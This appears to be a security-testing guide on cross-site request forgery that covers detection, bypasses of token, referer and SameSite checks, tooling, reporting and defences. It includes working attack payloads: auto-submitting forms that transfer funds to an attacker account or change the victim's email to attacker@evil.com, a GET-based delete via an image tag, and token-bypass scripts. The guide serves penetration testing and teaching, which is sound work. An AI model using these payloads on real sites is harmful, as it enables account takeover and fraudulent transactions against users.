CSRF (Cross-Site Request Forgery) Testing

Overview

Vulnerability Principle

• The attacker lures the user to visit a malicious page
• The malicious page automatically sends a request to the target website
• The browser automatically carries the user's authentication information (Cookie, Session)
• The target website mistakenly treats it as a legitimate user operation

Testing Methods

1. Identify Sensitive Operations

• Password modification
• Email modification
• Fund transfer
• Permission change
• Data deletion
• Status update

2. Detect CSRF Token

<!-- With Token Protection -->
<form method="POST" action="/change-password">
  <input type="hidden" name="csrf_token" value="abc123">
  <input type="password" name="new_password">
</form>

<!-- No Token Protection - CSRF Risk Exists -->
<form method="POST" action="/change-email">
  <input type="email" name="new_email">
</form>

3. Verify Token Validity

• Whether the Token is based on timestamp
• Whether the Token is based on user ID
• Whether the Token can be reused
• Whether the Token is shared across multiple requests

4. Check Referer Validation

// Normal Request
Referer: https://target.com/change-password

// Test Bypass
Referer: https://target.com.evil.com
Referer: https://evil.com/?target.com
Referer: (empty)

Exploitation Techniques

Basic CSRF Attack

<form action="https://target.com/api/transfer" method="POST" id="csrf">
  <input type="hidden" name="to" value="attacker_account">
  <input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>

JSON CSRF

<!-- Submit JSON using form -->
<form action="https://target.com/api/update" method="POST" enctype="text/plain">
  <input name='{"email":"attacker@evil.com","ignore":"' value='"}'>
</form>
<script>document.forms[0].submit();</script>

CSRF via GET Request

<img src="https://target.com/api/delete?id=123">

Bypass Techniques

Token Bypass

// If Token exists in both Cookie and form
// You can try to only submit the Token from Cookie
fetch('https://target.com/api/action', {
  method: 'POST',
  credentials: 'include',
  body: 'action=delete&id=123'
  // Does not include csrf_token parameter, relies on Cookie
});

SameSite Cookie Bypass

• If SameSite=Lax, GET requests can still carry Cookie
• Exploit subdomain for attack

Double Submit Cookie

<!-- If Token is in Cookie and validation logic is flawed -->
<form action="https://target.com/api/action" method="POST">
  <input type="hidden" name="csrf_token" value="">
  <script>
    // Read Token from Cookie
    document.cookie.split(';').forEach(c => {
      if(c.trim().startsWith('csrf_token=')) {
        document.querySelector('input[name="csrf_token"]').value = 
          c.split('=')[1];
      }
    });
  </script>
</form>

Tool Usage

Burp Suite

1. Intercept the target request
2. Right-click → Engagement tools → Generate CSRF PoC
3. Test the generated PoC

OWASP ZAP

# Perform CSRF scan using ZAP
zap-cli quick-scan --self-contained --start-options '-config api.disablekey=true' http://target.com

Verification and Reporting

Verification Steps

1. Confirm that the target operation has no CSRF Token protection
2. Construct malicious request and verify it can be executed
3. Assess impact (data leakage, privilege escalation, financial loss, etc.)
4. Record complete PoC

Key Reporting Points

• Vulnerability location and affected operations
• Attack scenarios and impact scope
• Complete exploitation steps and PoC
• Remediation suggestions (CSRF Token, SameSite Cookie, Referer validation, etc.)

Protection Measures

Recommended Solutions

1. CSRF Token
   • Each form contains a unique Token
   • Token is stored in Session
   • Verify Token validity
2. SameSite Cookie
   javascript

   Set-Cookie: session=abc123; SameSite=Strict; Secure

3. Double Submit Cookie
   • Token exists in both Cookie and form
   • Verify if they match
4. Referer Validation
   • Verify if Referer is same-origin
   • Pay attention to handling empty Referer

Notes

• Only perform in authorized testing environments
• Avoid causing actual impact to user accounts
• Record all testing steps
• Consider behavioral differences across browsers